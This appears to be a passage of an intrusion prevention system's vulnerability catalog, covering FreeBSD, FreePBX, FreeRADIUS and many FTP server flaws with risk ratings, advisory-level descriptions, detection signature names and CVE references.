Software:

<os>

Type:

Malfunction

Description:

There exists a denial-of-service vulnerability in FreeBSD kernel SCTP ICMPv6 stack.

Situation:

IPv6_FreeBSD-SCTP-ICMPv6-Denial-Of-Service

References:

CVE-2016-1879
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1879

FreeBSD-TCP-Reassembly-Denial-Of-Service

About this vulnerability:

A vulnerability in FreeBSD

Risk:

High

First detected in:

sgpkg-ips-587-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

FreeBSD

Software:

<os>

Type:

Malfunction

Description:

A denial of service vulnerability has been reported in the FreeBSD kernel. The vulnerability is due to an error in TCP reassembly code when processing certain crafted sequence of TCP segments. Under certain circumstances, when TCP segments completely fill up an internal reassembly queue, FreeBSD adds a reassembly queue entry from the stack to the list. When the function returns, this stack entry can contain undefined data, leading to memory corruption. A remote unauthenticated attacker can exploit this vulnerability by sending crafted TCP segments to a vulnerable server. A successful exploitation will cause the kernel to crash resulting in a denial of service condition.

Situation:

TCP_Segment-Invalid

References:

CVE-2014-3000
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3000

BID-67153
http://www.securityfocus.com/bid/67153

OSVDB-106442
http://www.osvdb.org/106442

Freefloat-FTP-Server-Invalid-Command-Buffer-Overflow

About this vulnerability:

A vulnerability in Freefloat FTP Server

Risk:

Moderate

First detected in:

sgpkg-ips-414-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Freefloat FTP Server

Type:

Buffer Overflow

Description:

A buffer overflow vulnerability exists in Freefloat FTP Server. The vulnerability is due to a boundary error when handling invalid FTP commands. Remote attackers could exploit this vulnerability by sending an overly long invalid FTP commands to the target. Successful exploits could lead to injection and execution of arbitrary code on the vulnerable server.

Situation:

FTP_Command-Syntax-Incorrect
FTP_Oversized-Username
FTP_Oversized-Pathname

References:

BID-48704
http://www.securityfocus.com/bid/48704

BID-49265
http://www.securityfocus.com/bid/49265

Freeftpd-Key-Exchange-Algorithm-String-Buffer-Overflow

About this vulnerability:

A Freeftpd Key Exchange Algorithm String Buffer Overflow vulnerability.

Risk:

High

First detected in:

sgpkg-ips-739-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

FreeFTPd

Type:

Buffer Overflow

Description:

A buffer overflow vulnerability in FreeFTPd, version 1.0.10, which allows remote attackers to execute arbitrary code via a long key exchange algorithm string.

Situation:

SSH_Freeftpd-Key-Exchange-Algorithm-String-Buffer-Overflow

References:

CVE-2006-2407
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2407

BID-17958
http://www.securityfocus.com/bid/17958

OSVDB-25569
http://www.osvdb.org/25569

Freeftpd-User-Name-Buffer-Overflow

About this vulnerability:

A vulnerability in FreeFTPD Project FreeFTPD

Risk:

Moderate

First detected in:

sgpkg-ips-413-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

FreeFTPd

Type:

Malfunction

Description:

A buffer overflow vulnerability exists in the FreeFTPD product. The affected product does not verify the length of the user supplied FTP command arguments. A malicious user can supply an overly long user name argument during the login procedure to exploit the flaw. Exploitation of this flaw may result in the divertion of the process flow of the vulnerable process. An attack may result in either a denial of service condition of the affected service or diversion of the process flow of the affected process. In the case of a successful code execution attack, the affected process will be diverted to attacker supplied code which is injected during the attack. It is most probable that the affected server will stop to function as intended after having been compromised. If a code execution attack is not successful, then only a denial of service condition will result. In the case of a denial of service attack, the affected process will terminate and will have to be manually restarted in order to restore functionality.

Situation:

FTP_CS-Freeftpd-User-Name-Buffer-Overflow

References:

CVE-2005-3683
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3683

BID-15457
http://www.securityfocus.com/bid/15457

OSVDB-20909
http://www.osvdb.org/20909

FreePBX-Framework-Asterisk-Recording-Interface-Unserialize-Code-Execution

About this vulnerability:

A vulnerability in FreePBX Project FreePBX

Risk:

High

First detected in:

sgpkg-ips-619-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

FreePBX

Type:

Input Validation

Description:

A code execution vulnerability exists in FreePBX. The vulnerability is due to an input validation issue in the index.php file of the recordings directory. A remote unauthenticated attacker can exploit this vulnerability by sending a specially crafted request to the page. Successful exploitation could lead to arbitrary code execution on the server under the security context of the web server.

Situation:

HTTP_CSH-FreePBX-Framework-Asterisk-Recording-Interface-Unserialize-Code-Execution

References:

CVE-2014-7235
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7235

BID-70188
http://www.securityfocus.com/bid/70188

OSVDB-112437
http://www.osvdb.org/112437

FreePBX-Framework-Hotelwakeup-Module-Directory-Traversal

About this vulnerability:	A vulnerability in FreePBX Project hotelwakeup Module
Risk:	Moderate
First detected in:	sgpkg-ips-830-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	FreePBX
Type:	Directory Traversal
Description:	Improper validation of user input in the hotelwakeup module of FreePBX causes a directory traversal vulnerability. A successful exploitation allows an attacker to run arbitrary code with the privileges of the user running the daemon.
Situation:	HTTP_CRL-FreePBX-Framework-Hotelwakeup-Module-Directory-Traversal

FreePBX-Framework-Module-Config.php-Code-Execution

About this vulnerability:

A vulnerability in FreePBX Project FreePBX

Risk:

High

First detected in:

sgpkg-ips-597-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

FreePBX

Type:

Input Validation

Description:

A code execution vulnerability exists in FreePBX. The vulnerability is due to an error in admin/config.php, the main interface to FreePBX. A remote unauthenticated attacker can exploit this vulnerability to execute arbitrary code on the vulnerable system with the privileges of FreePBX.

Situation:

HTTP_CRL-FreePBX-Framework-Module-Config.php-Code-Execution

References:

CVE-2014-1903
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1903

OSVDB-103240
http://www.osvdb.org/103240

FreePBX-Framework-Modulefunctions-Display-SQL-Injection

About this vulnerability:	A vulnerability in FreePBX Project FreePBX
Risk:	Moderate
First detected in:	sgpkg-ips-800-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	FreePBX
Type:	Input Validation
Description:	Improper validation of HTTP requests causes an SQL injection vulnerability in FreePBX. A successful exploitation can allow an attacker to run arbitrary code on the target system.
Situation:	HTTP_CRL-FreePBX-Framework-Modulefunctions-Display-SQL-Injection

FreePBX-Framework-Recordings-Module-Remote-Command-Execution

About this vulnerability:	A vulnerability in FreePBX
Risk:	Moderate
First detected in:	sgpkg-ips-798-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	FreePBX
Type:	Input Validation
Description:	A vulnerability in FreePBX
Situation:	HTTP_CRL-FreePBX-Framework-Recordings-Module-Remote-Command-Execution

FreePBX-Recording-Interface-File-Upload-Code-Execution

About this vulnerability:

A vulnerability in FreePBX

Risk:

High

First detected in:

sgpkg-ips-378-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

FreePBX

Type:

Directory Traversal

Description:

A code execution vulnerability exists in FreePBX software. The vulnerability is due to a design error in the system recordings interface while handling uploaded files. The software does not properly check the file type being uploaded as well as the user extension (phone number) that can be manipulated to trigger directory traversal. This can be exploited by remote attackers to upload malicious files at arbitrary locations and execute arbitrary code with the privileges of the user running Apache web server (normally asterisk).

Situation:

HTTP_CS-FreePBX-Recording-Interface-File-Upload-Code-Execution

References:

CVE-2010-3490
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3490

BID-43454
http://www.securityfocus.com/bid/43454

FreePBX-Remote-Command-Execution

About this vulnerability:

A FreePBX Remote Command Execution vulnerability.

Risk:

Moderate

First detected in:

sgpkg-ips-707-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

FreePBX

Type:

Input Validation

Description:

An input validation vulnerability in FreePBX, versions 2.9.0 and 2.10.0, in the callme_startcall function in recordings/misc/callme_page.php, which allows remote attackers to execute arbitrary commands via the callmenum parameter in a c action.

Situation:

HTTP_CSU_FreePBX-Remote-Command-Execution

References:

CVE-2012-4869
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4869

BID-52630
http://www.securityfocus.com/bid/52630

OSVDB-80544
http://www.osvdb.org/80544

FreePBX-Remotemod-Remote-Command-Execution

About this vulnerability:	A vulnerability in FreePBX
Risk:	Moderate
First detected in:	sgpkg-ips-800-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	FreePBX
Type:	Input Validation
Description:	A vulnerability in FreePBX
Situation:	HTTP_CRL-FreePBX-Remotemod-Remote-Command-Execution

FreeRADIUS-Access-Request-Denial-Of-Service

About this vulnerability:

A denial of server vulnerability in FreeRADIUS Project RADIUS Server

Risk:

High

First detected in:

sgpkg-ips-251-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

FreeRADIUS

Type:

Input Validation

Description:

There is a denial of service vulnerability in FreeRADIUS server. The vulnerability is due to an error when processing crafted access request packets.

Situation:

Generic_UDP-FreeRADIUS-Access-Request-Denial-Of-Service

References:

CVE-2009-3111
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3111

BID-36263
http://www.securityfocus.com/bid/36263

FreeRADIUS-Ascend-Send-Receive-Secret-DoS

About this vulnerability:	A vulnerability in FreeRADIUS
Risk:	High
First detected in:	sgpkg-ips-409-4219
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	FreeRADIUS
Type:	Malfunction
Description:	A vulnerability exists in the way the FreeRADIUS software package handles out of sequence messages. When a RADIUS authentication or accounting request is sent out-of-order to a vulnerable FreeRADIUS, a memory exception occurs. This vulnerability may be leveraged by a remote attacker to deny service to the FreeRADIUS server.
Situation:	Generic_UDP-FreeRADIUS-Ascend-Send-Receive-Secret-DoS

FreeRADIUS-Client-Certificate-Verification-Stack-Buffer-Overflow

About this vulnerability:

A vulnerability in FreeRADIUS Server Project FreeRADIUS

Risk:

Moderate

First detected in:

sgpkg-ips-505-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

FreeRADIUS

Type:

Buffer Overflow

Description:

A stack buffer overflow vulnerability has been identified in FreeRADIUS. The vulnerability is due to an error in the certificate verification function when using TLS-based EAP. The application copies a time stamp into a stack buffer without sufficient validation. A remote attacker could exploit this vulnerability by supplying the server with a specially crafted certificate. Successful exploitation could result in arbitrary code execution in the context of the affected application.

Situation:

Generic_UDP-FreeRADIUS-Client-Certificate-Verification-Stack-Buffer-Overflow

References:

CVE-2012-3547
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3547

BID-55483
http://www.securityfocus.com/bid/55483

OSVDB-85325
http://www.osvdb.org/85325

FreeRADIUS-Data2vp_Wimax-Heap-Buffer-Overflow

About this vulnerability:

A vulnerability in FreeRADIUS Server Project FreeRADIUS

Risk:

Moderate

First detected in:

sgpkg-ips-956-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

FreeRADIUS

Type:

Buffer Overflow

Description:

Improper handling of the continuation flag in WiMAX attributes causes a buffer overflow vulnerability in FreeRADIUS. A successful attack allows an attacker to run arbitrary code on the target system.

Situation:

Generic_UDP-FreeRADIUS-Data2vp_Wimax-Heap-Buffer-Overflow

References:

CVE-2017-10984
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10984

FreeRADIUS-FR_DHCP_attr2vp-Integer-Underflow-Out-Of-Bounds-Read

About this vulnerability:

A vulnerability in FreeRADIUS Server Project FreeRADIUS

Risk:

Moderate

First detected in:

sgpkg-ips-975-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

FreeRADIUS

Type:

Integer Overflow

Description:

Improper parsing of DHCP messages causes an out of bounds read in FreeRADIUS. This can be used to exploit an integer underflow vulnerability, which may result in the radius process terminating.

Situation:

BOOTP_CS-FreeRADIUS-FR_DHCP_attr2vp-Integer-Underflow-Out-Of-Bounds-Read

References:

CVE-2017-10986
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10986

FreeRADIUS-Rad_Coalesce-Out-Of-Bounds-Read

About this vulnerability:

A vulnerability in FreeRADIUS Server Project FreeRADIUS

Risk:

Moderate

First detected in:

sgpkg-ips-970-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

FreeRADIUS

Type:

Malfunction

Description:

Improper handling of WiMAX attribute lengths causes a buffer overflow vulnerability in FreeRADIUS. A successful attack allows an attacker to run arbitrary code on the target system.

Situation:

Generic_UDP-FreeRADIUS-Rad_Coalesce-Out-Of-Bounds-Read

References:

CVE-2017-10979
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10979

FreeSWITCH-Event-Socket-Command-Execution

About this vulnerability:	A vulnerability in FreeSWITCH
Risk:	High
First detected in:	sgpkg-ips-1206-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	FreeSWITCH
Type:	Input Validation
Description:	There exists a vulnerability in FreeSWITCH, multiple versions, which allows remote attackers to execute system commands by using the "system" API command, due to insufficient user input validation.
Situation:	Generic_CS-FreeSWITCH-Event-Socket-Command-Execution

Freetype-Heap-Buffer-Overflow-CVE-2020-15999

About this vulnerability:

A vulnerability in Freetype font rendering library

Risk:

High

First detected in:

sgpkg-ips-1290-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Chrome

Type:

Input Validation

Description:

A heap buffer overflow vulnerability exists in the FreeType font rendering library.

Situation:

File-Binary_Freetype-Heap-Buffer-Overflow-CVE-2020-15999
File-Text_Freetype-Heap-Buffer-Overflow-CVE-2020-15999

References:

CVE-2020-15999
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15999

FrontPage-Fp30reg-DLL-BOF-MS03-051

About this vulnerability:

Fp30reg.dll MS03-051 buffer overflow

Risk:

High

First detected in:

sgpkg-ips-1-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

IIS; FrontPage Server Extensions 2000; FrontPage Server Extensions 2002

Type:

Buffer Overflow

Description:

Microsoft FrontPage Server Extensions have a buffer overflow in fp30reg.dll library. This can be remote exploited via specific http request. There are working exploits publicly available.

Situation:

HTTP_CS-IIS-Fp-BOF-MS03-051

References:

CVE-2003-0822
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0822

BID-9007
http://www.securityfocus.com/bid/9007

MS03-051
http://technet.microsoft.com/security/bulletin/MS03-051

Froxlor-Log-Path-RCE

About this vulnerability:

A vulnerability in Froxlor.

Risk:

High

First detected in:

sgpkg-ips-1564-5242

Last changed:

sgpkg-ips-1567-5242

Platform:

Unix; Linux

Software:

Froxlor

Type:

Input Validation

Description:

A vulnerability in Froxlor, versions v2.0.7 and prior, which allows remote attackers to change the application logs path to any directory on the OS, allowing the writing and execution of malicious twig templates.

Situation:

HTTP_CS-Froxlor-Log-Path-RCE
HTTP_CRL-Froxlor-Log-Path-RCE

References:

CVE-2023-0315
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0315

Froxlor-Simexporter.php-Import-Unrestricted-File-Upload

About this vulnerability:

A vulnerability in Froxlor

Risk:

Moderate

First detected in:

sgpkg-ips-1586-5242

Last changed:

sgpkg-ips-1586-5242

Platform:

Generic

Software:

Froxlor

Type:

Input Validation

Description:

An unrestricted file upload vulnerability has been reported in Froxlor. The vulnerability is due to incorrect image filename validation in SImExporter.php. A remote, authenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successfully exploiting this vulnerability could result in remote code execution under froxlorlocal account privileges.

Situation:

File-Text_Froxlor-Simexporter.php-Import-Unrestricted-File-Upload

References:

CVE-2023-2034
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-2034

FTP-3Com-3CDaemon-Username-Buffer-Overflow

About this vulnerability:

Buffer overflow vulnerability in the 3Com 3CDaemon FTP Server

Risk:

High

First detected in:

sgpkg-ips-110-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

3Com 3CDaemon

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in the 3Com 3CDaemon. When an oversized username is given with the USER command, a buffer overflow occurs. If successfully exploited, the attacker can execute arbitrary commands on the server.

Situation:

FTP_CS-Ability-Server-Stor-BOF

References:

CVE-2005-0277
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0277

BID-12155
http://www.securityfocus.com/bid/12155

FTP-Ability-Server-Stor-BOF

About this vulnerability:

Buffer overflow in Ability FTP server

Risk:

High

First detected in:

sgpkg-ips-15-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Ability FTP Server

Type:

Buffer Overflow

Description:

Code-Crafters Ability Server 2.3.4 has a buffer overflow vulnerability in the handling of STOR commands. By sending a STOR command with a long argument, a remote attacker can overflow a buffer and execute arbitrary code on the host.

Situation:

References:

CVE-2004-1626
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1626

BID-11508
http://www.securityfocus.com/bid/11508

OSVDB-11030
http://www.osvdb.org/11030

FTP-Administrator-Login-Failure

About this vulnerability:	Failed administrator FTP login attempt detected
Risk:	Low
First detected in:	sgpkg-ips-92-1314
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Generic FTP server
Type:	Failed Login
Description:	A failed attempt to login as an administrator user was detected. Multiple attempts may indicate that there is a brute force attack against the administrator account in progress.
Situation:	FTP_SS-Administrator-Login-Failure

FTP-AIX-Ftpd-BOF-Libc

About this vulnerability:

Aix Ftpd BOF Libc

Risk:

Moderate

First detected in:

sgpkg-ips-1-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Unix

Software:

AIX ftpd

Type:

Buffer Overflow

Description:

Aix ftpd libc buffer overflow vulnerability.

Situation:

FTP_CS-AIX-Ftpd-BO-Libc
FTP_CS-AIX-BO-Libc-2

References:

CVE-1999-0789
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0789

BID-679
http://www.securityfocus.com/bid/679

OSVDB-9
http://www.osvdb.org/9

FTP-Anonymous-Login-Attempt

About this vulnerability:	Anonymous FTP login attempt detected
Risk:	Low
First detected in:	sgpkg-ips-85-1314
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Generic FTP server
Type:	Insecure Configuration
Description:	By default, many FTP servers enable anonymous FTP logins. Users logging in anonymously do not need an account on the server, and no passwords are required. The login name for anonymous logins is usually 'anonymous' or 'ftp', and the users are asked to use their email address as the password. FTP servers allowing anonymous logins can be security risks, depending on the location of the servers and the company policy.
Situation:	FTP_CS-Anonymous-Login-Attempt

FTP-Bin-Ls-BOF

About this vulnerability:

Buffer overflow in bin/ls

Risk:

Moderate

First detected in:

sgpkg-ips-5-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Unix

Software:

Generic FTP server

Type:

Buffer Overflow

Description:

/bin/ls can be crashed by specifying suitable command line options, which may result in a denial-of-service situation. This vulnerability can be exploited by remote attackers via applications that use ls, for example WU-FTPD.

Situation:

FTP_CS-Bin-Ls-BOF

References:

CVE-2003-0853
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0853

BID-8875
http://www.securityfocus.com/bid/8875

FTP-BOF-ProFTPD-WU-FTPD

About this vulnerability:

Buffer Overflow in ProFTPD and WU-FTPD

Risk:

High

First detected in:

sgpkg-ips-1-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Linux

Software:

ProFTPD; WU-FTPD; BeroFTPD

Type:

Buffer Overflow

Description:

Buffer overflow in ProFTPD and WU-FTPD allows remote attackers to gain root access via a series of MKD and CWD commands that create nested directories.

Situation:

FTP_CS-BOF-ProFTPD-Pro
FTP_CS-BOF-ProFTPD-2
FTP_CS-BOF-ProFTPD-3
FTP_CS-Cd-BOF-Linux-Mkd
FTP_CS-BOF-Mkd-5
FTP_CS-BOF-Mkd-6
FTP_CS-BOF-Cwd

References:

CVE-1999-0911
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0911

BID-612
http://www.securityfocus.com/bid/612

OSVDB-144
http://www.osvdb.org/144

FTP-Bounce-Attack

About this vulnerability:

FTP bounce attack

Risk:

Moderate

First detected in:

sgpkg-ips-253-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Generic FTP server

Type:

Insecure Configuration

Description:

In the FTP bounce attack, the attacker exploits the FTP protocol by using the PORT command to request access to ports or host not directly available for the attacker. This way the attacker uses the FTP server as a proxy. This technique can be used to port scan hosts, and to access hosts that the attacker cannot access through a direct connection.

Situation:

FTP_PORT-IP-Address-Mismatch
FTP_PORT-IP-Address-Mismatch-Success

References:

CVE-1999-0017
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0017

BID-126
http://www.securityfocus.com/bid/126

FTP-BSD-Ftpd-Directory-Name-Buffer-Overflow

About this vulnerability:

Buffer overflow in the directory name handling within NetBSD's FTP server

Risk:

Moderate

First detected in:

sgpkg-ips-86-1314

Last changed:

sgpkg-ips-1296-5242

Platform:

NetBSD

Software:

BSD ftpd

Type:

Input Validation

Description:

NetBSD's FTP server implementation contains buffer overflow vulnerability in directory name handling.

Situation:

FTP_CS-BSD-Ftpd-Directory-Name-Buffer-Overflow

References:

CVE-2006-6652
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6652

BID-21377
http://www.securityfocus.com/bid/21377

OSVDB-31781
http://www.osvdb.org/31781

FTP-BSD-Ftpd-Glob-Buffer-Overflow

About this vulnerability:

Buffer overflow vulnerability in BSD-based FTP servers

Risk:

High

First detected in:

sgpkg-ips-1-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Unix

Software:

BSD ftpd

Type:

Buffer Overflow

Description:

Multiple BSD-based FTP servers have a buffer overflow vulnerability in the parsing of user-supplied data. A remote attacker can exploit this vulnerability using metacharacters in path/file names which are then expanded by the glob() function in the server. A successfull exploit will give a root access to the target host.

Situation:

FTP_CS-FreeBSD-BOF-Glob
FTP_CS-FreeBSD-BOF-Glob-2
FTP_CS-FreeBSD-BOF-Glob-3

References:

CVE-2001-0247
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0247

BID-2548
http://www.securityfocus.com/bid/2548

FTP-Cisco-Mkd-Buffer-Overflow

About this vulnerability:

Buffer Overflow in Cisco IOS FTP daemon

Risk:

High

First detected in:

sgpkg-ips-168-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Cisco IOS

Software:

<os>

Type:

Buffer Overflow

Description:

A remotely exploitable buffer overflow exists in Cisco IOS FTP server.

Situation:

FTP_CS-Cisco-IOS-FTP-Mkd-BOF
FTP_CS-Cisco-IOS-FTP-Mkd-BOF-2

References:

CVE-2007-2586
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2586

BID-23885
http://www.securityfocus.com/bid/23885

OSVDB-35334
http://www.osvdb.org/35334

FTP-Crob-RMD-Command-Buffer-Overflow

About this vulnerability:

Buffer overflow vulnerability in Crob FTP server

Risk:

High

First detected in:

sgpkg-ips-29-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Crob FTP Server

Type:

Buffer Overflow

Description:

Crob FTP Server contains a buffer overflow vulnerability in then handling of RMD command. Remote attackers can exploit this vulnerability by sending an arbitrary FTP command with long parameter followed with RMD command with very a long parameter value. With successful exploit attacker can compromise the system that runs the Crob FTP Server.

Situation:

FTP_CS-Crob-RMD-Command-Buffer-Overflow

References:

CVE-2005-1873
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1873

BID-13847
http://www.securityfocus.com/bid/13847

FTP-Curl-Client-Error-BOF

About this vulnerability:

Curl Client Error Buffer Overflow

Risk:

High

First detected in:

sgpkg-ips-1-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Linux

Software:

curl ftp client

Type:

Buffer Overflow

Description:

The curl ftp client software has an error in the error message size handling which could be exploited by a server to gain a system compromise of the client machine.

Situation:

FTP_SS-Curl-Client-Error-BOF

References:

CVE-2000-0973
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0973

BID-1804
http://www.securityfocus.com/bid/1804

FTP-Cwd-Root-System-Compromise

About this vulnerability:

CWD ~root command allows system compromise

Risk:

Moderate

First detected in:

sgpkg-ips-2-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Unix

Software:

Generic FTP server

Type:

Malfunction

Description:

Very old versions of the FTP daemon allow unauthorized access by a "CWD ~root" command. This vulnerability can be exploited remotely to gain root permissions on the host.

Situation:

FTP_CS-Cwd-Root-System-Compromise

References:

CVE-1999-0082
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0082

FTP-DreamFTP-Username-Format-String-System-Compromise

About this vulnerability:

DreamFTP format string vulnerability in username

Risk:

High

First detected in:

sgpkg-ips-25-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

DreamFTP

Type:

Format String

Description:

DreamFTP ftp server has a format string vulnerability in the handling of user names. The vulnerability allows remote attackers to execute arbitrary code on the system by sending a username that contains format string characters. No authentication is needed, as the server can be exploited before authentication.

Situation:

FTP_CS-Suspicious-Format-String-Modifiers-In-FTP-Command

References:

CVE-2004-0277
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0277

BID-9600
http://www.securityfocus.com/bid/9600

FTP-Failed-Login

About this vulnerability:	Failed FTP login
Risk:	Low
First detected in:	sgpkg-ips-65-1210
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Generic FTP server
Type:	Failed Login
Description:	Failed FTP login attempt. If these failed attempts come in large numbers from a single host, a remote attacker may be trying to guess passwords via a brute-force method.
Situation:	FTP_SS-Failed-Login

FTP-File-Globbing-Generic

About this vulnerability:

File Globbing Generic Vulnerability

Risk:

High

First detected in:

sgpkg-ips-1-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Unix

Software:

WU-FTPD

Type:

Malfunction

Description:

Multiple FTPD's suffer from a denial of service vulnerability related to the glob() function call, sometimes even a system compromise can be achieved.

Situation:

FTP_CS-File-Globbing-Attack

References:

CVE-2001-0550
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0550

BID-3581
http://www.securityfocus.com/bid/3581

OSVDB-686
http://www.osvdb.org/686

FTP-FileCOPA-List-Command-Buffer-Overflow

About this vulnerability:

Buffer overflow vulnerability in the handling of the LIST command in FileCOPA FTP Server

Risk:

Moderate

First detected in:

sgpkg-ips-73-1314

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

FileCOPA FTP Server

Type:

Buffer Overflow

Description:

FileCOPA FTP Server has a buffer overflow vulnerability in the handling of the LIST command. A successful exploitation of this vulnerability allows an authenticated remote attacker to cause a DoS or to compromise a vulnerable system.

Situation:

FTP_CS-FileCOPA-List-Command-Buffer-Overflow

References:

CVE-2006-3726
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3726

BID-19065
http://www.securityfocus.com/bid/19065

OSVDB-27389
http://www.osvdb.org/27389

FTP-Hd-Soft-Windows-FTP-Server-Format-Strings

About this vulnerability:

Format string vulnerability in HD Soft's Windows FTP Server.

Risk:

Moderate

First detected in:

sgpkg-ips-8-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

HD Soft's Windows FTP Server

Type:

Format String

Description:

HD Soft's Windows FTP Server suffers from a format string vulnerability. Remote attackers can exploit the vulnerability to execute arbitrary code on the host by sending a crafted string as the login name.

Situation:

FTP_CS-Hd-Soft-Windows-FTP-Server-Format-Strings

References:

CVE-2004-0069
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0069

BID-9385
http://www.securityfocus.com/bid/9385

FTP-Microsoft-Internet-Explorer-FTP-Response-Parsing-Memory-Corruption

About this vulnerability:

Memory corruption vulnerability in Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-97-1314

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Buffer Overflow

Description:

There is a memory corruption vulnerability in Internet Explorer. By persuading a target user to visit a malicious web page, a remote attacker may execute arbitrary code on the target host with the privileges of the currently logged in user.

Situation:

FTP_SS-Microsoft-Internet-Explorer-FTP-Response-Parsing-Memory-Corruption

References:

CVE-2007-0217
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0217

BID-22489
http://www.securityfocus.com/bid/22489

OSVDB-31892
http://www.osvdb.org/31892

MS07-016
http://technet.microsoft.com/security/bulletin/MS07-016

FTP-Microsoft-Windows-FTP-Service-Status-Command-Buffer-Overflow

About this vulnerability:

Buffer overflow in the status command parameter handling within Microsoft Windows FTP service

Risk:

Moderate

First detected in:

sgpkg-ips-89-1314

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Input Validation

Description:

The FTP service implementation shipped with various versions of Microsoft Windows contains a buffer overflow vulnerability in the metacharacter handling in status command parameters.

Situation:

FTP_CS-Microsoft-Windows-FTP-Service-Status-Command-Buffer-Overflow

References:

CVE-2002-0073
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0073

BID-4482
http://www.securityfocus.com/bid/4482

OSVDB-3328
http://www.osvdb.org/3328

MS02-018
http://technet.microsoft.com/security/bulletin/MS02-018

FTP-Palmetto-BOF

About this vulnerability:

Palmetto buffer overflows in WU-FTPD and proftpd

Risk:

High

First detected in:

sgpkg-ips-1-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

WU-FTPD; ProFTPD

Type:

Buffer Overflow

Description:

Remote exploitable buffer overflows in WU-FTPD and ProFTPD. Exploitation requires write access to the system. Such is often found within "incoming" directory. Successful exploit leads to remote root compromise

Situation:

FTP_CS-WU-FTPD-ProFTPD-Palmetto-BOF
FTP_CS-WU-FTPD-Palmetto-BOF-Ftpwarez
FTP_CS-WU-FTPD-Palmetto-BOF-Wh0a
